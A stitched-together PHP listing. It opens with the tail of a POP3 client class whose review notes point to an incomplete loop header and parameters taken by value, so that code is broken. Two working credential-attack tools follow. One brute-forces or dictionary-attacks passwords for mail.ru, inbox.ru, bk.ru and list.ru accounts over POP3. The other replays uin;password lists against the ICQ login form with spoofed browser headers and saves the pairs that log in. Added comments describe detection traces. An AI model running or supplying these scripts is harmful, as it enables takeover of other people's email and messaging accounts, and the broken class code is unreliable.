if($this->state=="DISCONNECTED")
return("no connection was opened");
if($this->must_update)
{
if($this->PutLine("QUIT")==0)
return("Could not send the QUIT command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get quit command response");
if(strtok($response," ")!="+OK")
return("Could not quit the connection: ".strtok("\r\n"));
}
$this->CloseConnection();
$this->state="DISCONNECTED";
return("");
}
// Authenticates in the AUTHORIZATION state. With $apop set it sends APOP with
// md5(greeting . password); otherwise it sends USER and then PASS with the
// password in clear text. On success the state becomes TRANSACTION.
Function Login($user,$password,$apop)
{
if($this->state!="AUTHORIZATION")
return("connection is not in AUTHORIZATION state");
if($apop)
{
if($this->PutLine("APOP $user ".md5($this->greeting.$password))==0)
return("Could not send the APOP command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get APOP login command response");
if(strtok($response," ")!="+OK")
return("APOP login failed: ".strtok("\r\n"));
}
else
{
if($this->PutLine("USER $user")==0)
return("Could not send the USER command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get user login entry response");
if(strtok($response," ")!="+OK")
return("User error: ".strtok("\r\n"));
if($this->PutLine("PASS $password")==0)
return("Could not send the PASS command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get login password entry response");
if(strtok($response," ")!="+OK")
return("Password error: ".strtok("\r\n"));
}
$this->state="TRANSACTION";
return("");
}
// Sends STAT and parses the two numbers of the reply into $messages and $size.
// NOTE(review): both parameters are taken by value in this copy, so the
// assignments below are not visible to the caller.
Function Statistics($messages,$size)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("STAT")==0)
return("Could not send the STAT command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get the statistics command response");
if(strtok($response," ")!="+OK")
return("Could not get the statistics: ".strtok("\r\n"));
$messages=strtok(" ");
$size=strtok(" ");
return("");
}
// Sends UIDL (when $unique_id is set) or LIST. With $message == "" it returns
// an array indexed by message number; otherwise it returns the second number
// of the single-line reply. Errors are returned as strings.
// NOTE(review): the inner for(...) header is incomplete in this copy of the file.
Function ListMessages($message,$unique_id)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($unique_id)
$list_command="UIDL";
else
$list_command="LIST";
if($this->PutLine("$list_command $message")==0)
return("Could not send the $list_command command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message list command response");
if(strtok($response," ")!="+OK")
return("Could not get the message listing: ".strtok("\r\n"));
if($message=="")
{
for($messages=array();
{
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message list response");
if($response==".") // a lone "." ends the multi-line reply
break;
$message=intval(strtok($response," "));
if($unique_id)
$messages[$message]=strtok(" ");
else
$messages[$message]=intval(strtok(" "));
}
return($messages);
}
else
{
$message=intval(strtok(" "));
return(intval(strtok(" ")));
}
}
// Sends RETR when $lines is negative, otherwise TOP with $lines, and reads the
// reply into $headers (up to the first empty line) and $body (the rest).
// A leading "." on a line is removed; a lone "." ends the message.
// NOTE(review): $headers and $body are taken by value in this copy, so the
// collected lines are not visible to the caller.
Function RetrieveMessage($message,$headers,$body,$lines)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($lines<0)
{
$command="RETR";
$arguments="$message";
}
else
{
$command="TOP";
$arguments="$message $lines";
}
if($this->PutLine("$command $arguments")==0)
return("Could not send the $command command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message retrieval command response");
if(strtok($response," ")!="+OK")
return("Could not retrieve the message: ".strtok("\r\n"));
// Header section.
for($headers=$body=array(),$line=0;;$line++)
{
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not retrieve the message");
switch($response)
{
case ".":
return("");
case "":
break 2; // empty line: leave the switch and the for loop, headers are done
default:
if(substr($response,0,1)==".")
$response=substr($response,1,strlen($response)-1);
break;
}
$headers[$line]=$response;
}
// Body section.
for($line=0;;$line++)
{
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not retrieve the message");
switch($response)
{
case ".":
return("");
default:
if(substr($response,0,1)==".")
$response=substr($response,1,strlen($response)-1);
break;
}
$body[$line]=$response;
}
return("");
}
// Sends DELE for one message and sets $must_update so that Close() sends QUIT.
Function DeleteMessage($message)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("DELE $message")==0)
return("Could not send the DELE command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message delete command response");
if(strtok($response," ")!="+OK")
return("Could not delete the message: ".strtok("\r\n"));
$this->must_update=1;
return("");
}
// Sends RSET and clears $must_update.
Function ResetDeletedMessages()
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("RSET")==0)
return("Could not send the RSET command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get reset deleted messages command response");
if(strtok($response," ")!="+OK")
return("Could not reset deleted messages: ".strtok("\r\n"));
$this->must_update=0;
return("");
}
// Sends NOOP and checks for a "+OK" reply.
Function IssueNOOP()
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("NOOP")==0)
return("Could not send the NOOP command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not NOOP command response");
if(strtok($response," ")!="+OK")
return("Could not issue the NOOP command: ".strtok("\r\n"));
return("");
}
};
PHP Simple mail.ru brute
<html>
<head>
<title>MailBrute By Joker-jar</title>
<meta http-equiv=Content-Type content="text/html; charset=windows-1251">
</head>
<body>
<?
// Run-time settings and configuration of the page.
// Defensive reading: the three calls below make the request run without a
// time limit, keep running after the browser disconnects and hide all errors,
// so on the hosting side this shows up as a long-lived PHP request holding
// outbound connections to port 110. pass.txt, good.txt and bad.txt are the
// on-disk traces of the tool.
set_time_limit(0);
ignore_user_abort(1);
error_reporting(0);
// Allow-list of POP3 servers; the posted "popserver" value is used as the key.
$servers = Array(
"mail" => "pop3.mail.ru",
"inbox" => "pop3.inbox.ru",
"bk" => "pop3.bk.ru",
"list" => "pop3.list.ru",
);
$pop3port = 110; // plain-text POP3 port
$passfile = "pass.txt"; // dictionary of candidate passwords
$good = "good.txt"; // accepted name/password pair is appended here
$bad = "bad.txt"; // every rejected candidate is appended here
// Tests one username/password pair against a POP3 server. Returns true only
// when the reply to "pass" starts with "+" and is longer than 3 bytes; returns
// false for a failed connection, an unexpected greeting, a rejected user or a
// rejected password alike.
// A new TCP connection (30 s connect timeout) is opened on $pop3port for every
// call and the credentials are sent in clear text.
function CheckPass($pop3server, $username, $pass)
{
global $pop3port;
$fp = fsockopen($pop3server, $pop3port, $errno, $errstr, 30);
if (!$fp)
return false;
$buf = fgets($fp, 128); // server greeting
if ($buf[0] != "+")
{
fclose($fp);
return false;
}
fputs($fp,"user ".$username."\r\n");
$buf = fgets($fp, 128); // reply to "user"
if ($buf[0] != "+")
{
fclose($fp);
return false;
}
fputs($fp,"pass ".$pass."\r\n");
$buf = fgets($fp, 128); // reply to "pass"
if (strlen($buf) > 3 && $buf[0] == "+")
{
fclose($fp);
return true;
}
fclose($fp);
return false;
}
// Builds a string made of $l copies of the first character of $alf.
// Returns "" when $l is zero or negative.
function genstr($l, $alf)
{
    $filled = "";
    for ($count = 0; $count < $l; ++$count) {
        $filled = $filled . $alf[0];
    }
    return $filled;
}
// Returns the string that follows $p when $p is read as a counter over the
// alphabet $alf with the lowest-order position first: the first position that
// is not at the last alphabet character is advanced by one, every position
// before it is reset to the first character, and when all positions are at
// the last character the string grows by one first character.
function nextpass($p, $alf)
{
    $lastIndex = strlen($alf) - 1;
    $pos = 0;
    while ($pos < strlen($p)) {
        $found = strpos($alf, $p[$pos]);
        if ($found != $lastIndex) {
            // Not at the end of the alphabet: advance this position and stop.
            $p[$pos] = $alf[$found + 1];
            return $p;
        }
        // At the end of the alphabet: wrap this position and carry on.
        $p[$pos] = $alf[0];
        $pos++;
    }
    return $p . $alf[0];
}
// Form handler: runs only when the form was posted. It validates the inputs
// and then tries passwords for the account $_POST["name"] on the chosen
// server, either generated from the posted alphabet or read from $passfile.
// Every rejected candidate is appended in clear text to $bad, a match to
// $good, and the script exits on the first match. CheckPass() opens a new
// connection per candidate, so the mail server would see a steady series of
// failed logins for a single account; per-account and per-source limits on
// failed logins bound this kind of guessing.
if (isset($_POST["name"]))
{
if ($_POST["name"] === "")
{
echo "Отсутствует имя</body></html>";
exit;
}
// The posted server key must exist in the $servers allow-list.
if (!isset($servers[$_POST["popserver"]]))
{
echo "Неправильно задан pop3 сервер</body></html>";
exit;
}
// Both lengths are cast to int; zero or max < min is rejected.
settype($_POST["minl"],"int");
settype($_POST["maxl"],"int");
if ($_POST["minl"] == 0 || $_POST["maxl"] == 0 || $_POST["maxl"] - $_POST["minl"] < 0)
{
echo "Ошибка в параметрах длины пароля</body></html>";
exit;
}
if ($_POST["dict"] !== "yes" && $_POST["alf"] === "")
{
echo "Алфавит пуст</body></html>";
exit;
}
if ($_POST["dict"] === "yes" && (!file_exists($passfile) || filesize($passfile) == 0))
{
echo "Файл $passfile пуст или отсутствует</body></html>";
exit;
}
if ($_POST["dict"] !== "yes")
{
// Exhaustive search
// Starts at minl copies of the first alphabet character and stops when the
// candidate equals maxl+1 copies of it.
$startpass = genstr($_POST["minl"],$_POST["alf"]);
$endpass = genstr($_POST["maxl"]+1,$_POST["alf"]);
$curpass = $startpass;
while ($curpass != $endpass)
{
if (CheckPass($servers[$_POST["popserver"]], $_POST["name"], $curpass))
{
$f = fopen($good, 'ab');
fwrite($f, $_POST["name"]." : ".$curpass."\r\n");
fclose($f);
exit;
}
else
{
$f = fopen($bad, 'ab');
fwrite($f, $_POST["name"]." : ".$curpass."\r\n");
fclose($f);
}
$curpass = nextpass($curpass,$_POST["alf"]);
}
}
else
{
// Dictionary attack
$passes = file($passfile);
for($i=0; $i<count($passes);$i++)
{
$curpass = trim($passes[$i]);
if (CheckPass($servers[$_POST["popserver"]], $_POST["name"], $curpass))
{
$f = fopen($good, 'ab');
fwrite($f, $_POST["name"]." : ".$curpass."\r\n");
fclose($f);
exit;
}
else
{
$f = fopen($bad, 'ab');
fwrite($f, $_POST["name"]." : ".$curpass."\r\n");
fclose($f);
}
}
}
}
?>
<fieldset style="width: 500">
<legend>Параметры брута</legend>
<form method="POST">
<table border="0">
<tr><td>
<input type="text" name="name" style="width: 100">
</td><td>@
<select name="popserver" style="width: 100">
<option value="mail" selected>mail.ru
<option value="inbox">inbox.ru
<option value="bk">bk.ru
<option value="list">list.ru
</select>
</td></tr>
<tr><td colspan="2"><br>
<input type="radio" name=dict value="yes" checked>Атака по словарю pass.txt<br>
<input type="radio" name=dict value="no">Атака полным перебором
</td></tr>
<tr><td style="text-align: right">
алфавит:
</td><td>
<input type="text" name="alf" style="width: 200" value="abcdefghijklmnopqrstuvwxyz">
</td></tr>
<tr><td style="text-align: right">
мин длина:
</td><td>
<input type="text" name="minl" style="width: 50" value="1">
</td></tr>
<tr><td style="text-align: right">
макс длина:
</td><td>
<input type="text" name="maxl" style="width: 50" value="5">
</td></tr>
<tr><td colspan="2">
<br>
<input type="submit" value="Начать брут и идти спать">
</td></tr>
</table>
</form>
</fieldset>
</body>
</html>
Artix ICQ phpBrute
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Artix ICQ phpBrute</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body>
<?
/// Reads "uin;password" lines from ./pass.txt, posts each pair to a login form
/// on www.icq.com over plain HTTP and records the pairs whose response passes
/// the cookie check below. Progress is written to ./stat.html every 10th line.
/// Defensive reading: the request is hand-built and constant apart from the
/// form body - POST /karma/login.php, the User-Agent value "Opera 7.50rulez"
/// (the two concatenations below have no CRLF between them), Referer
/// http://yandex.ru/ and a new connection per attempt - so it can be matched
/// in web-server logs and rate-limited per source. ./pass.txt, ./.htgood.txt
/// and ./stat.html are the on-disk traces of the tool.
/// Let the script run without a time limit
set_time_limit(0);
/// Report all errors except notices
Error_Reporting(E_ALL & ~E_NOTICE);
/// Constants, please do not change
$config=array();
$config['good']='./.htgood.txt'; /// Valid numbers are stored here (the .ht prefix is recommended so that the file cannot be read over the web)
$config['pass']='./pass.txt'; /// Password list
$config['separator']=';'; /// Separator in "uin;pass" lines
$config['host']='www.icq.com'; /// HTTP server of the ICQ service
$config['port']=80; /// HTTP port
$config['statfile']='./stat.html'; /// Status file
/// If a run is already in progress, show its result
if(file_exists($config['statfile']))
{
include($config['statfile']);
echo '
</body>
</html>';
exit();
}
/// Pretend to be a browser
$request = "POST /karma/login.php HTTP/1.1\r\n";
$request .= "Host: ".$config['host']." \r\n";
$request .= "User-Agent: Opera 7.50";
$request .= "rulez\r\n";
$request .= "Keep-Alive: 300\r\n";
$request .= "Connection: keep-alive\r\n";
$request .= "Referer: http://yandex.ru/ \r\n";
/// Counters of bad and good UINs
$goodcount=0;
$badcount=0;
/// Open the password file
$pass=file($config['pass']);
/// The guessing loop itself
for($i=0;$i<count($pass);$i++)
{
list($s,$s1)=explode($config['separator'],$pass[$i]);
/// Form data sent to the server
$posts = array ( 'dest' => '/whitepages/user_details.php',
'desc' => '',
'service' => '20',
'css'=> 'whitepages',
'uin_email'=> $s,
'password' => trim($s1)
);
$postValues="";
$s=''; // $s is reused from here on as the response buffer
/// URL-encoding
foreach( $posts AS $name => $value )
{
$postValues .= urlencode($name) . "=" . urlencode($value) . '&';
}
/// Build the POST request
$lenght = strlen($postValues);
$request2 = $request."Content-Type: application/x-www-form-urlencoded\r\n";
$request2 .= "Content-Length: $lenght\r\n";
$request2 .= "\r\n";
$request2 .= $postValues;
/// Open the socket
$fp = fsockopen($config['host'],$config['port'], $errno, $errstr, 30);
if (!$fp)
{
/// In case of an error
echo "$errstr ($errno)<br />\n";
}
else
{
/// Send the data to whitepages
fwrite($fp, $request2);
while (!feof($fp))
{
$s.=fgets($fp, 128);
}
}
/// Close the socket
fclose($fp);
/// If the account logged in, whitepages sends cookies, which is what we catch. The whole page is not downloaded
// The search string is partly masked with asterisks as it appears on this page.
if(strpos($s,'Set-C*****')==true)
{
$good=fopen($config['good'],'a');
fwrite($good,$pass[$i]);
fclose($good);
$goodcount++;
}
else $badcount++;
if($i%10==0)
{
$count=count($pass)-$i;
/// Update the statistics
$s=<<<HTML
--------------------------<br>
<b>Artix ICQ phpBrute</b> <br>
--------------------------<br>
Хороших: $goodcount<br>
Плохих: $badcount<br>
Осталось: $count<br>
---<br>
HTML;
$stat=fopen($config['statfile'],'w+');
fwrite($stat,$s);
fclose($stat);
}
}
$s=<<<HTML
--------------------------<br>
<b>Artix ICQ phpBrute</b> <br>
--------------------------<br>
Работа завершена. <br>
Хороших: $goodcount<br>
Плохих: $badcount<br>
Для продолжения, удалите файл со статистикой<br>
---<br>
HTML;
/// Write the final result to the file
$stat=fopen($config['statfile'],'w+');
fwrite($stat,$s);
fclose($stat);
/// Run finished
?>
©Tyson